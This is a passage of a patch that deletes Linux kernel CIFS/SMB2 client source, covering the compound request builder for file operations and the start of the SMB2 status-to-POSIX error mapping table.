+-		.create_options = cifs_create_options(cifs_sb, create_options),
+-		.fid = &fid,
+-		.mode = mode,
+-		.cifs_sb = cifs_sb,
+-	};
+-
+-	rqst[num_rqst].rq_iov = &vars->open_iov[0];
+-	rqst[num_rqst].rq_nvec = SMB2_CREATE_IOV_SIZE;
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst[num_rqst], &oplock, &vars->oparms,
+-			    utf16_path);
+-	kfree(utf16_path);
+-	if (rc)
+-		goto finished;
+-
+-	smb2_set_next_command(tcon, &rqst[num_rqst]);
+- after_open:
+-	num_rqst++;
+-	rc = 0;
+-
+-	/* Operation */
+-	switch (command) {
+-	case SMB2_OP_QUERY_INFO:
+-		rqst[num_rqst].rq_iov = &vars->qi_iov[0];
+-		rqst[num_rqst].rq_nvec = 1;
+-
+-		if (cfile)
+-			rc = SMB2_query_info_init(tcon, server,
+-				&rqst[num_rqst],
+-				cfile->fid.persistent_fid,
+-				cfile->fid.volatile_fid,
+-				FILE_ALL_INFORMATION,
+-				SMB2_O_INFO_FILE, 0,
+-				sizeof(struct smb2_file_all_info) +
+-					  PATH_MAX * 2, 0, NULL);
+-		else {
+-			rc = SMB2_query_info_init(tcon, server,
+-				&rqst[num_rqst],
+-				COMPOUND_FID,
+-				COMPOUND_FID,
+-				FILE_ALL_INFORMATION,
+-				SMB2_O_INFO_FILE, 0,
+-				sizeof(struct smb2_file_all_info) +
+-					  PATH_MAX * 2, 0, NULL);
+-			if (!rc) {
+-				smb2_set_next_command(tcon, &rqst[num_rqst]);
+-				smb2_set_related(&rqst[num_rqst]);
+-			}
+-		}
+-
+-		if (rc)
+-			goto finished;
+-		num_rqst++;
+-		trace_smb3_query_info_compound_enter(xid, ses->Suid, tcon->tid,
+-						     full_path);
+-		break;
+-	case SMB2_OP_POSIX_QUERY_INFO:
+-		rqst[num_rqst].rq_iov = &vars->qi_iov[0];
+-		rqst[num_rqst].rq_nvec = 1;
+-
+-		if (cfile)
+-			rc = SMB2_query_info_init(tcon, server,
+-				&rqst[num_rqst],
+-				cfile->fid.persistent_fid,
+-				cfile->fid.volatile_fid,
+-				SMB_FIND_FILE_POSIX_INFO,
+-				SMB2_O_INFO_FILE, 0,
+-				/* TBD: fix following to allow for longer SIDs */
+-				sizeof(struct smb311_posix_qinfo *) + (PATH_MAX * 2) +
+-				(sizeof(struct cifs_sid) * 2), 0, NULL);
+-		else {
+-			rc = SMB2_query_info_init(tcon, server,
+-				&rqst[num_rqst],
+-				COMPOUND_FID,
+-				COMPOUND_FID,
+-				SMB_FIND_FILE_POSIX_INFO,
+-				SMB2_O_INFO_FILE, 0,
+-				sizeof(struct smb311_posix_qinfo *) + (PATH_MAX * 2) +
+-				(sizeof(struct cifs_sid) * 2), 0, NULL);
+-			if (!rc) {
+-				smb2_set_next_command(tcon, &rqst[num_rqst]);
+-				smb2_set_related(&rqst[num_rqst]);
+-			}
+-		}
+-
+-		if (rc)
+-			goto finished;
+-		num_rqst++;
+-		trace_smb3_posix_query_info_compound_enter(xid, ses->Suid, tcon->tid, full_path);
+-		break;
+-	case SMB2_OP_DELETE:
+-		trace_smb3_delete_enter(xid, ses->Suid, tcon->tid, full_path);
+-		break;
+-	case SMB2_OP_MKDIR:
+-		/*
+-		 * Directories are created through parameters in the
+-		 * SMB2_open() call.
+-		 */
+-		trace_smb3_mkdir_enter(xid, ses->Suid, tcon->tid, full_path);
+-		break;
+-	case SMB2_OP_RMDIR:
+-		rqst[num_rqst].rq_iov = &vars->si_iov[0];
+-		rqst[num_rqst].rq_nvec = 1;
+-
+-		size[0] = 1; /* sizeof __u8 See MS-FSCC section 2.4.11 */
+-		data[0] = &delete_pending[0];
+-
+-		rc = SMB2_set_info_init(tcon, server,
+-					&rqst[num_rqst], COMPOUND_FID,
+-					COMPOUND_FID, current->tgid,
+-					FILE_DISPOSITION_INFORMATION,
+-					SMB2_O_INFO_FILE, 0, data, size);
+-		if (rc)
+-			goto finished;
+-		smb2_set_next_command(tcon, &rqst[num_rqst]);
+-		smb2_set_related(&rqst[num_rqst++]);
+-		trace_smb3_rmdir_enter(xid, ses->Suid, tcon->tid, full_path);
+-		break;
+-	case SMB2_OP_SET_EOF:
+-		rqst[num_rqst].rq_iov = &vars->si_iov[0];
+-		rqst[num_rqst].rq_nvec = 1;
+-
+-		size[0] = 8; /* sizeof __le64 */
+-		data[0] = ptr;
+-
+-		if (cfile) {
+-			rc = SMB2_set_info_init(tcon, server,
+-						&rqst[num_rqst],
+-						cfile->fid.persistent_fid,
+-						cfile->fid.volatile_fid,
+-						current->tgid,
+-						FILE_END_OF_FILE_INFORMATION,
+-						SMB2_O_INFO_FILE, 0,
+-						data, size);
+-		} else {
+-			rc = SMB2_set_info_init(tcon, server,
+-						&rqst[num_rqst],
+-						COMPOUND_FID,
+-						COMPOUND_FID,
+-						current->tgid,
+-						FILE_END_OF_FILE_INFORMATION,
+-						SMB2_O_INFO_FILE, 0,
+-						data, size);
+-			if (!rc) {
+-				smb2_set_next_command(tcon, &rqst[num_rqst]);
+-				smb2_set_related(&rqst[num_rqst]);
+-			}
+-		}
+-		if (rc)
+-			goto finished;
+-		num_rqst++;
+-		trace_smb3_set_eof_enter(xid, ses->Suid, tcon->tid, full_path);
+-		break;
+-	case SMB2_OP_SET_INFO:
+-		rqst[num_rqst].rq_iov = &vars->si_iov[0];
+-		rqst[num_rqst].rq_nvec = 1;
+-
+-
+-		size[0] = sizeof(FILE_BASIC_INFO);
+-		data[0] = ptr;
+-
+-		if (cfile)
+-			rc = SMB2_set_info_init(tcon, server,
+-				&rqst[num_rqst],
+-				cfile->fid.persistent_fid,
+-				cfile->fid.volatile_fid, current->tgid,
+-				FILE_BASIC_INFORMATION,
+-				SMB2_O_INFO_FILE, 0, data, size);
+-		else {
+-			rc = SMB2_set_info_init(tcon, server,
+-				&rqst[num_rqst],
+-				COMPOUND_FID,
+-				COMPOUND_FID, current->tgid,
+-				FILE_BASIC_INFORMATION,
+-				SMB2_O_INFO_FILE, 0, data, size);
+-			if (!rc) {
+-				smb2_set_next_command(tcon, &rqst[num_rqst]);
+-				smb2_set_related(&rqst[num_rqst]);
+-			}
+-		}
+-
+-		if (rc)
+-			goto finished;
+-		num_rqst++;
+-		trace_smb3_set_info_compound_enter(xid, ses->Suid, tcon->tid,
+-						   full_path);
+-		break;
+-	case SMB2_OP_RENAME:
+-		rqst[num_rqst].rq_iov = &vars->si_iov[0];
+-		rqst[num_rqst].rq_nvec = 2;
+-
+-		len = (2 * UniStrnlen((wchar_t *)ptr, PATH_MAX));
+-
+-		vars->rename_info.ReplaceIfExists = 1;
+-		vars->rename_info.RootDirectory = 0;
+-		vars->rename_info.FileNameLength = cpu_to_le32(len);
+-
+-		size[0] = sizeof(struct smb2_file_rename_info);
+-		data[0] = &vars->rename_info;
+-
+-		size[1] = len + 2 /* null */;
+-		data[1] = (__le16 *)ptr;
+-
+-		if (cfile)
+-			rc = SMB2_set_info_init(tcon, server,
+-						&rqst[num_rqst],
+-						cfile->fid.persistent_fid,
+-						cfile->fid.volatile_fid,
+-					current->tgid, FILE_RENAME_INFORMATION,
+-					SMB2_O_INFO_FILE, 0, data, size);
+-		else {
+-			rc = SMB2_set_info_init(tcon, server,
+-					&rqst[num_rqst],
+-					COMPOUND_FID, COMPOUND_FID,
+-					current->tgid, FILE_RENAME_INFORMATION,
+-					SMB2_O_INFO_FILE, 0, data, size);
+-			if (!rc) {
+-				smb2_set_next_command(tcon, &rqst[num_rqst]);
+-				smb2_set_related(&rqst[num_rqst]);
+-			}
+-		}
+-		if (rc)
+-			goto finished;
+-		num_rqst++;
+-		trace_smb3_rename_enter(xid, ses->Suid, tcon->tid, full_path);
+-		break;
+-	case SMB2_OP_HARDLINK:
+-		rqst[num_rqst].rq_iov = &vars->si_iov[0];
+-		rqst[num_rqst].rq_nvec = 2;
+-
+-		len = (2 * UniStrnlen((wchar_t *)ptr, PATH_MAX));
+-
+-		vars->link_info.ReplaceIfExists = 0;
+-		vars->link_info.RootDirectory = 0;
+-		vars->link_info.FileNameLength = cpu_to_le32(len);
+-
+-		size[0] = sizeof(struct smb2_file_link_info);
+-		data[0] = &vars->link_info;
+-
+-		size[1] = len + 2 /* null */;
+-		data[1] = (__le16 *)ptr;
+-
+-		rc = SMB2_set_info_init(tcon, server,
+-					&rqst[num_rqst], COMPOUND_FID,
+-					COMPOUND_FID, current->tgid,
+-					FILE_LINK_INFORMATION,
+-					SMB2_O_INFO_FILE, 0, data, size);
+-		if (rc)
+-			goto finished;
+-		smb2_set_next_command(tcon, &rqst[num_rqst]);
+-		smb2_set_related(&rqst[num_rqst++]);
+-		trace_smb3_hardlink_enter(xid, ses->Suid, tcon->tid, full_path);
+-		break;
+-	default:
+-		cifs_dbg(VFS, "Invalid command\n");
+-		rc = -EINVAL;
+-	}
+-	if (rc)
+-		goto finished;
+-
+-	/* We already have a handle so we can skip the close */
+-	if (cfile)
+-		goto after_close;
+-	/* Close */
+-	flags |= CIFS_CP_CREATE_CLOSE_OP;
+-	rqst[num_rqst].rq_iov = &vars->close_iov[0];
+-	rqst[num_rqst].rq_nvec = 1;
+-	rc = SMB2_close_init(tcon, server,
+-			     &rqst[num_rqst], COMPOUND_FID,
+-			     COMPOUND_FID, false);
+-	smb2_set_related(&rqst[num_rqst]);
+-	if (rc)
+-		goto finished;
+- after_close:
+-	num_rqst++;
+-
+-	if (cfile) {
+-		rc = compound_send_recv(xid, ses, server,
+-					flags, num_rqst - 2,
+-					&rqst[1], &resp_buftype[1],
+-					&rsp_iov[1]);
+-	} else
+-		rc = compound_send_recv(xid, ses, server,
+-					flags, num_rqst,
+-					rqst, resp_buftype,
+-					rsp_iov);
+-
+- finished:
+-	if (cfile)
+-		cifsFileInfo_put(cfile);
+-
+-	SMB2_open_free(&rqst[0]);
+-	if (rc == -EREMCHG) {
+-		pr_warn_once("server share %s deleted\n", tcon->tree_name);
+-		tcon->need_reconnect = true;
+-	}
+-
+-	switch (command) {
+-	case SMB2_OP_QUERY_INFO:
+-		idata = ptr;
+-		if (rc == 0 && cfile && cfile->symlink_target) {
+-			idata->symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
+-			if (!idata->symlink_target)
+-				rc = -ENOMEM;
+-		}
+-		if (rc == 0) {
+-			qi_rsp = (struct smb2_query_info_rsp *)
+-				rsp_iov[1].iov_base;
+-			rc = smb2_validate_and_copy_iov(
+-				le16_to_cpu(qi_rsp->OutputBufferOffset),
+-				le32_to_cpu(qi_rsp->OutputBufferLength),
+-				&rsp_iov[1], sizeof(idata->fi), (char *)&idata->fi);
+-		}
+-		if (rqst[1].rq_iov)
+-			SMB2_query_info_free(&rqst[1]);
+-		if (rqst[2].rq_iov)
+-			SMB2_close_free(&rqst[2]);
+-		if (rc)
+-			trace_smb3_query_info_compound_err(xid,  ses->Suid,
+-						tcon->tid, rc);
+-		else
+-			trace_smb3_query_info_compound_done(xid, ses->Suid,
+-						tcon->tid);
+-		break;
+-	case SMB2_OP_POSIX_QUERY_INFO:
+-		idata = ptr;
+-		if (rc == 0 && cfile && cfile->symlink_target) {
+-			idata->symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
+-			if (!idata->symlink_target)
+-				rc = -ENOMEM;
+-		}
+-		if (rc == 0) {
+-			qi_rsp = (struct smb2_query_info_rsp *)
+-				rsp_iov[1].iov_base;
+-			rc = smb2_validate_and_copy_iov(
+-				le16_to_cpu(qi_rsp->OutputBufferOffset),
+-				le32_to_cpu(qi_rsp->OutputBufferLength),
+-				&rsp_iov[1], sizeof(idata->posix_fi) /* add SIDs */,
+-				(char *)&idata->posix_fi);
+-		}
+-		if (rqst[1].rq_iov)
+-			SMB2_query_info_free(&rqst[1]);
+-		if (rqst[2].rq_iov)
+-			SMB2_close_free(&rqst[2]);
+-		if (rc)
+-			trace_smb3_posix_query_info_compound_err(xid,  ses->Suid, tcon->tid, rc);
+-		else
+-			trace_smb3_posix_query_info_compound_done(xid, ses->Suid, tcon->tid);
+-		break;
+-	case SMB2_OP_DELETE:
+-		if (rc)
+-			trace_smb3_delete_err(xid,  ses->Suid, tcon->tid, rc);
+-		else
+-			trace_smb3_delete_done(xid, ses->Suid, tcon->tid);
+-		if (rqst[1].rq_iov)
+-			SMB2_close_free(&rqst[1]);
+-		break;
+-	case SMB2_OP_MKDIR:
+-		if (rc)
+-			trace_smb3_mkdir_err(xid,  ses->Suid, tcon->tid, rc);
+-		else
+-			trace_smb3_mkdir_done(xid, ses->Suid, tcon->tid);
+-		if (rqst[1].rq_iov)
+-			SMB2_close_free(&rqst[1]);
+-		break;
+-	case SMB2_OP_HARDLINK:
+-		if (rc)
+-			trace_smb3_hardlink_err(xid,  ses->Suid, tcon->tid, rc);
+-		else
+-			trace_smb3_hardlink_done(xid, ses->Suid, tcon->tid);
+-		free_set_inf_compound(rqst);
+-		break;
+-	case SMB2_OP_RENAME:
+-		if (rc)
+-			trace_smb3_rename_err(xid,  ses->Suid, tcon->tid, rc);
+-		else
+-			trace_smb3_rename_done(xid, ses->Suid, tcon->tid);
+-		free_set_inf_compound(rqst);
+-		break;
+-	case SMB2_OP_RMDIR:
+-		if (rc)
+-			trace_smb3_rmdir_err(xid,  ses->Suid, tcon->tid, rc);
+-		else
+-			trace_smb3_rmdir_done(xid, ses->Suid, tcon->tid);
+-		free_set_inf_compound(rqst);
+-		break;
+-	case SMB2_OP_SET_EOF:
+-		if (rc)
+-			trace_smb3_set_eof_err(xid,  ses->Suid, tcon->tid, rc);
+-		else
+-			trace_smb3_set_eof_done(xid, ses->Suid, tcon->tid);
+-		free_set_inf_compound(rqst);
+-		break;
+-	case SMB2_OP_SET_INFO:
+-		if (rc)
+-			trace_smb3_set_info_compound_err(xid,  ses->Suid,
+-						tcon->tid, rc);
+-		else
+-			trace_smb3_set_info_compound_done(xid, ses->Suid,
+-						tcon->tid);
+-		free_set_inf_compound(rqst);
+-		break;
+-	}
+-
+-	if (rc && err_iov && err_buftype) {
+-		memcpy(err_iov, rsp_iov, 3 * sizeof(*err_iov));
+-		memcpy(err_buftype, resp_buftype, 3 * sizeof(*err_buftype));
+-	} else {
+-		free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+-		free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-		free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
+-	}
+-	kfree(vars);
+-	return rc;
+-}
+-
+-int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+-			 struct cifs_sb_info *cifs_sb, const char *full_path,
+-			 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse)
+-{
+-	__u32 create_options = 0;
+-	struct cifsFileInfo *cfile;
+-	struct cached_fid *cfid = NULL;
+-	struct kvec err_iov[3] = {};
+-	int err_buftype[3] = {};
+-	bool islink;
+-	int rc, rc2;
+-
+-	*adjust_tz = false;
+-	*reparse = false;
+-
+-	if (strcmp(full_path, ""))
+-		rc = -ENOENT;
+-	else
+-		rc = open_cached_dir(xid, tcon, full_path, cifs_sb, false, &cfid);
+-	/* If it is a root and its handle is cached then use it */
+-	if (!rc) {
+-		if (cfid->file_all_info_is_valid) {
+-			memcpy(&data->fi, &cfid->file_all_info, sizeof(data->fi));
+-		} else {
+-			rc = SMB2_query_info(xid, tcon, cfid->fid.persistent_fid,
+-					     cfid->fid.volatile_fid, &data->fi);
+-		}
+-		close_cached_dir(cfid);
+-		return rc;
+-	}
+-
+-	cifs_get_readable_path(tcon, full_path, &cfile);
+-	rc = smb2_compound_op(xid, tcon, cifs_sb, full_path, FILE_READ_ATTRIBUTES, FILE_OPEN,
+-			      create_options, ACL_NO_MODE, data, SMB2_OP_QUERY_INFO, cfile,
+-			      err_iov, err_buftype);
+-	if (rc) {
+-		struct smb2_hdr *hdr = err_iov[0].iov_base;
+-
+-		if (unlikely(!hdr || err_buftype[0] == CIFS_NO_BUFFER))
+-			goto out;
+-		if (rc == -EOPNOTSUPP && hdr->Command == SMB2_CREATE &&
+-		    hdr->Status == STATUS_STOPPED_ON_SYMLINK) {
+-			rc = smb2_parse_symlink_response(cifs_sb, err_iov,
+-							 &data->symlink_target);
+-			if (rc)
+-				goto out;
+-
+-			*reparse = true;
+-			create_options |= OPEN_REPARSE_POINT;
+-
+-			/* Failed on a symbolic link - query a reparse point info */
+-			cifs_get_readable_path(tcon, full_path, &cfile);
+-			rc = smb2_compound_op(xid, tcon, cifs_sb, full_path,
+-					      FILE_READ_ATTRIBUTES, FILE_OPEN,
+-					      create_options, ACL_NO_MODE, data,
+-					      SMB2_OP_QUERY_INFO, cfile, NULL, NULL);
+-			goto out;
+-		} else if (rc != -EREMOTE && hdr->Status == STATUS_OBJECT_NAME_INVALID) {
+-			rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
+-							     full_path, &islink);
+-			if (rc2) {
+-				rc = rc2;
+-				goto out;
+-			}
+-			if (islink)
+-				rc = -EREMOTE;
+-		}
+-		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
+-		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
+-			rc = -EOPNOTSUPP;
+-	}
+-
+-out:
+-	free_rsp_buf(err_buftype[0], err_iov[0].iov_base);
+-	free_rsp_buf(err_buftype[1], err_iov[1].iov_base);
+-	free_rsp_buf(err_buftype[2], err_iov[2].iov_base);
+-	return rc;
+-}
+-
+-
+-int smb311_posix_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+-				 struct cifs_sb_info *cifs_sb, const char *full_path,
+-				 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse)
+-{
+-	int rc;
+-	__u32 create_options = 0;
+-	struct cifsFileInfo *cfile;
+-	struct kvec err_iov[3] = {};
+-	int err_buftype[3] = {};
+-
+-	*adjust_tz = false;
+-	*reparse = false;
+-
+-	/*
+-	 * BB TODO: Add support for using the cached root handle.
+-	 * Create SMB2_query_posix_info worker function to do non-compounded query
+-	 * when we already have an open file handle for this. For now this is fast enough
+-	 * (always using the compounded version).
+-	 */
+-
+-	cifs_get_readable_path(tcon, full_path, &cfile);
+-	rc = smb2_compound_op(xid, tcon, cifs_sb, full_path, FILE_READ_ATTRIBUTES, FILE_OPEN,
+-			      create_options, ACL_NO_MODE, data, SMB2_OP_POSIX_QUERY_INFO, cfile,
+-			      err_iov, err_buftype);
+-	if (rc == -EOPNOTSUPP) {
+-		/* BB TODO: When support for special files added to Samba re-verify this path */
+-		if (err_iov[0].iov_base && err_buftype[0] != CIFS_NO_BUFFER &&
+-		    ((struct smb2_hdr *)err_iov[0].iov_base)->Command == SMB2_CREATE &&
+-		    ((struct smb2_hdr *)err_iov[0].iov_base)->Status == STATUS_STOPPED_ON_SYMLINK) {
+-			rc = smb2_parse_symlink_response(cifs_sb, err_iov, &data->symlink_target);
+-			if (rc)
+-				goto out;
+-		}
+-		*reparse = true;
+-		create_options |= OPEN_REPARSE_POINT;
+-
+-		/* Failed on a symbolic link - query a reparse point info */
+-		cifs_get_readable_path(tcon, full_path, &cfile);
+-		rc = smb2_compound_op(xid, tcon, cifs_sb, full_path, FILE_READ_ATTRIBUTES,
+-				      FILE_OPEN, create_options, ACL_NO_MODE, data,
+-				      SMB2_OP_POSIX_QUERY_INFO, cfile, NULL, NULL);
+-	}
+-
+-out:
+-	free_rsp_buf(err_buftype[0], err_iov[0].iov_base);
+-	free_rsp_buf(err_buftype[1], err_iov[1].iov_base);
+-	free_rsp_buf(err_buftype[2], err_iov[2].iov_base);
+-	return rc;
+-}
+-
+-int
+-smb2_mkdir(const unsigned int xid, struct inode *parent_inode, umode_t mode,
+-	   struct cifs_tcon *tcon, const char *name,
+-	   struct cifs_sb_info *cifs_sb)
+-{
+-	return smb2_compound_op(xid, tcon, cifs_sb, name,
+-				FILE_WRITE_ATTRIBUTES, FILE_CREATE,
+-				CREATE_NOT_FILE, mode, NULL, SMB2_OP_MKDIR,
+-				NULL, NULL, NULL);
+-}
+-
+-void
+-smb2_mkdir_setinfo(struct inode *inode, const char *name,
+-		   struct cifs_sb_info *cifs_sb, struct cifs_tcon *tcon,
+-		   const unsigned int xid)
+-{
+-	FILE_BASIC_INFO data;
+-	struct cifsInodeInfo *cifs_i;
+-	struct cifsFileInfo *cfile;
+-	u32 dosattrs;
+-	int tmprc;
+-
+-	memset(&data, 0, sizeof(data));
+-	cifs_i = CIFS_I(inode);
+-	dosattrs = cifs_i->cifsAttrs | ATTR_READONLY;
+-	data.Attributes = cpu_to_le32(dosattrs);
+-	cifs_get_writable_path(tcon, name, FIND_WR_ANY, &cfile);
+-	tmprc = smb2_compound_op(xid, tcon, cifs_sb, name,
+-				 FILE_WRITE_ATTRIBUTES, FILE_CREATE,
+-				 CREATE_NOT_FILE, ACL_NO_MODE,
+-				 &data, SMB2_OP_SET_INFO, cfile, NULL, NULL);
+-	if (tmprc == 0)
+-		cifs_i->cifsAttrs = dosattrs;
+-}
+-
+-int
+-smb2_rmdir(const unsigned int xid, struct cifs_tcon *tcon, const char *name,
+-	   struct cifs_sb_info *cifs_sb)
+-{
+-	drop_cached_dir_by_name(xid, tcon, name, cifs_sb);
+-	return smb2_compound_op(xid, tcon, cifs_sb, name, DELETE, FILE_OPEN,
+-				CREATE_NOT_FILE, ACL_NO_MODE,
+-				NULL, SMB2_OP_RMDIR, NULL, NULL, NULL);
+-}
+-
+-int
+-smb2_unlink(const unsigned int xid, struct cifs_tcon *tcon, const char *name,
+-	    struct cifs_sb_info *cifs_sb)
+-{
+-	return smb2_compound_op(xid, tcon, cifs_sb, name, DELETE, FILE_OPEN,
+-				CREATE_DELETE_ON_CLOSE | OPEN_REPARSE_POINT,
+-				ACL_NO_MODE, NULL, SMB2_OP_DELETE, NULL, NULL, NULL);
+-}
+-
+-static int
+-smb2_set_path_attr(const unsigned int xid, struct cifs_tcon *tcon,
+-		   const char *from_name, const char *to_name,
+-		   struct cifs_sb_info *cifs_sb, __u32 access, int command,
+-		   struct cifsFileInfo *cfile)
+-{
+-	__le16 *smb2_to_name = NULL;
+-	int rc;
+-
+-	smb2_to_name = cifs_convert_path_to_utf16(to_name, cifs_sb);
+-	if (smb2_to_name == NULL) {
+-		rc = -ENOMEM;
+-		goto smb2_rename_path;
+-	}
+-	rc = smb2_compound_op(xid, tcon, cifs_sb, from_name, access,
+-			      FILE_OPEN, 0, ACL_NO_MODE, smb2_to_name,
+-			      command, cfile, NULL, NULL);
+-smb2_rename_path:
+-	kfree(smb2_to_name);
+-	return rc;
+-}
+-
+-int
+-smb2_rename_path(const unsigned int xid, struct cifs_tcon *tcon,
+-		 const char *from_name, const char *to_name,
+-		 struct cifs_sb_info *cifs_sb)
+-{
+-	struct cifsFileInfo *cfile;
+-
+-	drop_cached_dir_by_name(xid, tcon, from_name, cifs_sb);
+-	cifs_get_writable_path(tcon, from_name, FIND_WR_WITH_DELETE, &cfile);
+-
+-	return smb2_set_path_attr(xid, tcon, from_name, to_name,
+-				  cifs_sb, DELETE, SMB2_OP_RENAME, cfile);
+-}
+-
+-int
+-smb2_create_hardlink(const unsigned int xid, struct cifs_tcon *tcon,
+-		     const char *from_name, const char *to_name,
+-		     struct cifs_sb_info *cifs_sb)
+-{
+-	return smb2_set_path_attr(xid, tcon, from_name, to_name, cifs_sb,
+-				  FILE_READ_ATTRIBUTES, SMB2_OP_HARDLINK,
+-				  NULL);
+-}
+-
+-int
+-smb2_set_path_size(const unsigned int xid, struct cifs_tcon *tcon,
+-		   const char *full_path, __u64 size,
+-		   struct cifs_sb_info *cifs_sb, bool set_alloc)
+-{
+-	__le64 eof = cpu_to_le64(size);
+-	struct cifsFileInfo *cfile;
+-
+-	cifs_get_writable_path(tcon, full_path, FIND_WR_ANY, &cfile);
+-	return smb2_compound_op(xid, tcon, cifs_sb, full_path,
+-				FILE_WRITE_DATA, FILE_OPEN, 0, ACL_NO_MODE,
+-				&eof, SMB2_OP_SET_EOF, cfile, NULL, NULL);
+-}
+-
+-int
+-smb2_set_file_info(struct inode *inode, const char *full_path,
+-		   FILE_BASIC_INFO *buf, const unsigned int xid)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct cifsFileInfo *cfile;
+-	int rc;
+-
+-	if ((buf->CreationTime == 0) && (buf->LastAccessTime == 0) &&
+-	    (buf->LastWriteTime == 0) && (buf->ChangeTime == 0) &&
+-	    (buf->Attributes == 0))
+-		return 0; /* would be a no op, no sense sending this */
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-
+-	cifs_get_writable_path(tcon, full_path, FIND_WR_ANY, &cfile);
+-	rc = smb2_compound_op(xid, tcon, cifs_sb, full_path,
+-			      FILE_WRITE_ATTRIBUTES, FILE_OPEN,
+-			      0, ACL_NO_MODE, buf, SMB2_OP_SET_INFO, cfile,
+-			      NULL, NULL);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+diff --git a/fs/cifs/smb2maperror.c b/fs/cifs/smb2maperror.c
+deleted file mode 100644
+index 194799ddd3828..0000000000000
+--- a/fs/cifs/smb2maperror.c
++++ /dev/null
+@@ -1,2481 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Functions which do error mapping of SMB2 status codes to POSIX errors
+- *
+- *   Copyright (C) International Business Machines  Corp., 2009
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#include <linux/errno.h>
+-#include "cifsglob.h"
+-#include "cifs_debug.h"
+-#include "smb2pdu.h"
+-#include "smb2proto.h"
+-#include "smb2status.h"
+-#include "smb2glob.h"
+-#include "trace.h"
+-
+-struct status_to_posix_error {
+-	__le32 smb2_status;
+-	int posix_error;
+-	char *status_string;
+-};
+-
+-static const struct status_to_posix_error smb2_error_map_table[] = {
+-	{STATUS_SUCCESS, 0, "STATUS_SUCCESS"},
+-	{STATUS_WAIT_0,  0, "STATUS_WAIT_0"},
+-	{STATUS_WAIT_1, -EIO, "STATUS_WAIT_1"},
+-	{STATUS_WAIT_2, -EIO, "STATUS_WAIT_2"},
+-	{STATUS_WAIT_3, -EIO, "STATUS_WAIT_3"},
+-	{STATUS_WAIT_63, -EIO, "STATUS_WAIT_63"},
+-	{STATUS_ABANDONED, -EIO, "STATUS_ABANDONED"},
+-	{STATUS_ABANDONED_WAIT_0, -EIO, "STATUS_ABANDONED_WAIT_0"},
+-	{STATUS_ABANDONED_WAIT_63, -EIO, "STATUS_ABANDONED_WAIT_63"},
+-	{STATUS_USER_APC, -EIO, "STATUS_USER_APC"},
+-	{STATUS_KERNEL_APC, -EIO, "STATUS_KERNEL_APC"},
+-	{STATUS_ALERTED, -EIO, "STATUS_ALERTED"},
+-	{STATUS_TIMEOUT, -ETIMEDOUT, "STATUS_TIMEOUT"},
+-	{STATUS_PENDING, -EIO, "STATUS_PENDING"},
+-	{STATUS_REPARSE, -EIO, "STATUS_REPARSE"},
+-	{STATUS_MORE_ENTRIES, -EIO, "STATUS_MORE_ENTRIES"},
+-	{STATUS_NOT_ALL_ASSIGNED, -EIO, "STATUS_NOT_ALL_ASSIGNED"},
+-	{STATUS_SOME_NOT_MAPPED, -EIO, "STATUS_SOME_NOT_MAPPED"},
+-	{STATUS_OPLOCK_BREAK_IN_PROGRESS, -EIO,
+-	"STATUS_OPLOCK_BREAK_IN_PROGRESS"},
+-	{STATUS_VOLUME_MOUNTED, -EIO, "STATUS_VOLUME_MOUNTED"},
+-	{STATUS_RXACT_COMMITTED, -EIO, "STATUS_RXACT_COMMITTED"},
+-	{STATUS_NOTIFY_CLEANUP, -EIO, "STATUS_NOTIFY_CLEANUP"},
+-	{STATUS_NOTIFY_ENUM_DIR, -EIO, "STATUS_NOTIFY_ENUM_DIR"},
+-	{STATUS_NO_QUOTAS_FOR_ACCOUNT, -EIO, "STATUS_NO_QUOTAS_FOR_ACCOUNT"},
+-	{STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED, -EIO,
+-	"STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED"},
+-	{STATUS_PAGE_FAULT_TRANSITION, -EIO, "STATUS_PAGE_FAULT_TRANSITION"},
+-	{STATUS_PAGE_FAULT_DEMAND_ZERO, -EIO, "STATUS_PAGE_FAULT_DEMAND_ZERO"},
+-	{STATUS_PAGE_FAULT_COPY_ON_WRITE, -EIO,
+-	"STATUS_PAGE_FAULT_COPY_ON_WRITE"},
+-	{STATUS_PAGE_FAULT_GUARD_PAGE, -EIO, "STATUS_PAGE_FAULT_GUARD_PAGE"},
+-	{STATUS_PAGE_FAULT_PAGING_FILE, -EIO, "STATUS_PAGE_FAULT_PAGING_FILE"},
+-	{STATUS_CACHE_PAGE_LOCKED, -EIO, "STATUS_CACHE_PAGE_LOCKED"},
+-	{STATUS_CRASH_DUMP, -EIO, "STATUS_CRASH_DUMP"},
+-	{STATUS_BUFFER_ALL_ZEROS, -EIO, "STATUS_BUFFER_ALL_ZEROS"},
+-	{STATUS_REPARSE_OBJECT, -EIO, "STATUS_REPARSE_OBJECT"},
+-	{STATUS_RESOURCE_REQUIREMENTS_CHANGED, -EIO,
+-	"STATUS_RESOURCE_REQUIREMENTS_CHANGED"},
+-	{STATUS_TRANSLATION_COMPLETE, -EIO, "STATUS_TRANSLATION_COMPLETE"},
+-	{STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY, -EIO,
+-	"STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY"},
